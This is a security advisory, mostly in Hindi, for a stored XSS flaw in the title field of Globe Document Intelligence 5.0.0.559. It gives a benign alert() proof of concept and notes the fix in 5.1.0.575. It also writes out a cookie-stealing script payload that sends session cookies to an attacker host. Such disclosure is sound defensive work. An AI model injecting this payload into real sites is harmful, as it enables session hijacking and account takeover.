
Public advisory for CVE-2025-65640: Stored XSS vulnerability in Globe Document Intelligence.
ग्लोब डॉक्यूमेंट इंटेलिजेंस प्लेटफॉर्म (संस्करण 5.0.0.559) में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता की पहचान की गई। एप्लिकेशन नवनिर्मित दस्तावेज़ के "शीर्षक" गुण के भीतर उपयोगकर्ता द्वारा प्रदान किए गए इनपुट को ठीक से स्वच्छ या एन्कोड करने में विफल रहता है। जब कोई प्रमाणित उपयोगकर्ता सारांश पृष्ठों (जैसे, "कार्य प्रगति पर / हाल ही") पर जाता है, तो दुर्भावनापूर्ण पेलोड पीड़ित के ब्राउज़र के संदर्भ में परावर्तित और निष्पादित होता है।
यह भेद्यता एक प्रमाणित हमलावर को सर्वर पर दुर्भावनापूर्ण जावास्क्रिप्ट कोड संग्रहीत करने की अनुमति देती है। जब अन्य प्रमाणित उपयोगकर्ता (प्रशासनिक खातों सहित) प्रभावित पृष्ठों को देखते हैं, तो स्क्रिप्ट स्वचालित रूप से निष्पादित होती है। जबकि नीचे दिया गया प्रूफ ऑफ कॉन्सेप्ट एक सौम्य alert() का उपयोग करके भेद्यता प्रदर्शित करता है, एक हमलावर इस दोष को सत्र अपहरण और खाता अधिग्रहण प्राप्त करने के लिए हथियार बना सकता है। उदाहरण के लिए, <script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script> जैसे पेलोड को इंजेक्ट करने से पीड़ित के सत्र कुकीज़ हमलावर द्वारा नियंत्रित बाहरी सर्वर पर चुपचाप बाहर निकल जाएंगी।
भेद्यता को पुन: उत्पन्न करने के लिए, एक प्रमाणित हमलावर इन चरणों का पालन कर सकता है:
<script>alert("XSS")</script>विक्रेता के अनुसार, यह भेद्यता संस्करण 5.1.0.575 में संबोधित की गई है। इस समस्या को ठीक करने के लिए, ग्लोब डॉक्यूमेंट इंटेलिजेंस प्लेटफॉर्म को संस्करण 5.1.0.575 में अपडेट करने की अनुशंसा की जाती है।
यह प्रूफ ऑफ कॉन्सेप्ट (PoC) विशेष रूप से शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। इस दस्तावेज़ में विस्तृत जानकारी और कोड का उपयोग दुर्भावनापूर्ण गतिविधियों या सिस्टम स्वामियों से स्पष्ट, पूर्व अनुमति के बिना किसी भी सिस्टम के विरुद्ध नहीं किया जाना चाहिए। लेखक किसी भी दायित्व को नहीं मानता है और प्रदान की गई सामग्री के अनुप्रयोग से होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।